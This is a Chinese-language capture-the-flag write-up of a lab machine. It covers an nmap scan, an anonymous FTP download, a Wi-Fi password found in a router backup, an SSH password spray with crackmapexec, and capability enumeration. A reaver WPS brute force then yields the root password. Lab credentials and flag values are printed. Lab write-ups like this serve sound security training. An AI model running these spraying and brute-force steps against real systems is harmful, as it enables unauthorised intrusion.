2023091801.jpg

靶场信息

image.png

信息搜集

使用nmap对靶场进行端口扫描

nmap -sC -sV -Pn 10.10.11.247

开放的 TCP 端口:FTP (21)、SSH (22) 和 DNS (53)

  • 21端口开放的ftp服务
  • 22端口开放ssh服务,主机是ubuntu 20.04 focus
  • 53端口开放open vnp

image.png

漏洞利用

FTP-TCP 21

namp扫描得知ftp服务可以使用Anonymous登入ftp服务存在5个文件
image.png
下载5个文件

mkdir ftp
wget -r ftp://10.10.11.247

image.png
可以看到3个pdf,1个txt,1个rar压缩包
image.png
分别查看pdf
发现有其中泄露了俩个用户名

samantha.wood93
olivia.walker17

image.png
image.png
查看txt无发现
image.png
解压查看rar压缩包

tar -xvf backup-OpenWrt-2023-07-26.tar

image.png

image.png
查看一下passd,无发现
image.png
config是一个配置文件目录对其查看其中文件发现wifi密码

image.png
使用ssh对其进行尝试登入

cme ssh 10.10.11.247 -u user.txt -p 'VeRyUniUqWiFIPasswrd1!'

crackmapexec ssh 10.10.11.247 -u user.txt -p 'VeRyUniUqWiFIPasswrd1!' --continue-on-success

image.png

ssh netadmin@10.10.11.247
VeRyUniUqWiFIPasswrd1!

ssh登入成功
image.png

flag1

拿到user权限的flag文件

id
ls
cat user.txt

image.png

2471dee96e082bd5df93c2dee9a1d038

权限提升

1.其他用户的主目录位于/home,netadmin用户无法访问这些目录
image.png
2./opt的 share与 FTP 上可用的目录相同
image.png

  1. 查找有suid属性权限的文件 
    find / -perm -4000 -or -perm -2000 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    image.png
  2. capabilities 提权
    getcap -r / 2>/dev/null
    image.png
    发现reaver-wps 破解器
reaver使用文档
https://manpages.ubuntu.com/manpages/jammy/man1/reaver.1.html

iw dev将提供有关无线接口的更多信息
image.png
使用刚刚发现的工具对其进行爆破

reaver
reaver -i mon0 -b 02:00:00:00:00:00 -vv

image.png
破解成功

WhatIsRealAnDWhAtIsNot51121!

image.png

su -

image.png

flag2

ls
cat root.txt
240a5267dd1db53f28c73e3d81253d1c

image.png

参考链接
https://0xdf.gitlab.io/2023/09/16/htb-wifinetic.html#background-1

申明:

本博客所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.